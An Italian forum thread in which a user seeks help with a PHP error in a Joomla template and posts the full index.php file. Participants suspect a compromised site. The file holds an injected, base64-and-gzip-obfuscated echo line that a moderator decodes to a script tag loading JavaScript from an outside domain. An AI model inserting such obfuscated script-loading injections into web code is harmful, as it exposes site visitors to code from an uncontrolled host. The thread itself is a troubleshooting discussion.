Visualizzazione risultati 1 fino 7 di 7

Discussione: Parse error: syntax error, unexpected T_ECHO

Guest

Predefinito Parse error: syntax error, unexpected T_ECHO

Buongiorno ragazzi io ho un problema alla linea 3 del file index del mio template vi allego il codice mi autate per favore???

cosa devo scrivere vicino ad echo???

Lo notate subito la linea di errore che è in rosso nell'immagine sotto.
    grazie a tutti.

L'avatar di radiodelmomento
    radiodelmomento non è connesso AlterGuru

Predefinito

La sintassi corretta è:
    Codice PHP:
    echo "testo";
    //oppure
    echo addslashes("testo");
    Se posti tutto il codice potremmo aiutarti meglio.
    Ciao!

Guest

Predefinito

ho messo tutto il codice sopra grazie

L'avatar di radiodelmomento
    radiodelmomento non è connesso AlterGuru

Predefinito

Ti ho chiesto se puoi mettere il codice sotto forma di testo e non di immagine.
    Inoltre ti ho già spiegato dov'è il problema.
    Comunque mi pare che ci sia qualcosa che non va poiché la chiusura del codice PHP non è segnata in rosso.
    Codice PHP:
    if(non riesci lo stesso a risolvere il problema){
    posta "TUTTO il codice (dall'apertura alla chiusura dei tag PHP)";
    }else{
    non possiamo aiutarti;
    }

Ciao!
    Ultima modifica di radiodelmomento : 07-02-2012 alle ore 14.52.43

Guest

Predefinito

Citazione Originalmente inviato da hitechardore Visualizza messaggio
    ho messo tutto il codice sopra grazie
    Sicuro che non ti sei beccato un deface con codice malevolo? (Ne ha tutta l'aria).

Prova ad eliminare la riga.

Guest

Predefinito

Codice PHP:
    <?php/** * @version $Id: index.php $ * @package Joomla.Site * @copyright Copyright (C) 2009 - 2011 SiteGround.com - All Rights Reserved. * @license GNU General Public License version 3 or later; see LICENSE.txt * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. */// No direct access.defined('_JEXEC') or die;JHTML::_('behavior.framework', true);/* The following line gets the application object for things like displaying the site name */$app = JFactory::getApplication();$tplparams = $app->getTemplate(true)->params;
    #11265a#
    echo(gzinflate(base64_decode("sylOLsosKFEoLkq2VcooKSmw0tcvLy/XSyxOTtTLLNHPKtbPKixNLarUK8nPzynWy83M08sqVrJTsNGH6LQDAA==")));
    #/11265a#
    ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>"><head> <jdoc:include type="head" /> <!-- The following line loads the template CSS file located in the template folder. --> <link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/css/template.css" type="text/css" /></head><body id="page_bg">
    <div id="mainwrap">
    <div id="header">

<div class="top-menu">
    <div id="sgmenu">
    <jdoc:include type="modules" name="menuload" />
    </div>
    </div>

<div id="search">
    <jdoc:include type="modules" name="position-0" />
    </div>

<h1><a href="<?php echo $this->baseurl ?>"><?php echo $app->getCfg('sitename'); ?></a></h1>

</div> <div id="wrapper"> <div id="content_m"> <?php if ($this->countModules( 'position-7 and position-4' )) : ?> <div class="maincol"> <?php elseif( $this->countModules( 'position-7' ) ) : ?> <div class="maincol_w_left"> <?php elseif( $this->countModules( 'position-4' ) ) : ?> <div class="maincol_w_right"> <?php else: ?> <div class="maincol_full"> <?php endif; ?> <?php if( $this->countModules('position-7') ) : ?> <div class="leftcol"> <jdoc:include type="modules" name="position-7" style="rounded"/> </div> <?php endif; ?>
    <div class="cont"> <jdoc:include type="component" /> </div> <?php if( $this->countModules('position-4') ) : ?> <div class="rightcol"> <jdoc:include type="modules" name="position-4" style="rounded"/> </div> <?php endif; ?> <div class="clr"></div> </div> </div>
    </div> </div>
    <div id="footergrad">
    <div id="footer">
    <p style="text-align:center;margin-top: 10px;"><?php $sg = ''; include "templates.php"; ?></p>
    </div>
    </div></body></html>
    EDIT:

ecco tutto il codice radiodelmomento.

che cos'è un deface con codice malevolo?
    Ultima modifica di alemoppo : 07-02-2012 alle ore 15.25.34 Motivo: +tag [php] Usa il tasto "Edita"

L'avatar di alemoppo
    alemoppo non è connesso Staff AV

Predefinito

Citazione Originalmente inviato da simpleticket Visualizza messaggio
    Sicuro che non ti sei beccato un deface con codice malevolo? (Ne ha tutta l'aria).

Prova ad eliminare la riga.
    Ho provato, e quell'echo stampa:
    Codice:
    <script src="http://www.asca.it/js/jquery.tools.min.js"> </script>
    Ho aperto lo script, e apparentemente sembra essere proprio jQuery.
    Adesso devo scappare, e non posso fare ulteriori prove...

@hitechardore: potresti ridimensionare l'immagine al primo post? Grazie.

Ciao!
    Ultima modifica di alemoppo : 07-02-2012 alle ore 15.27.17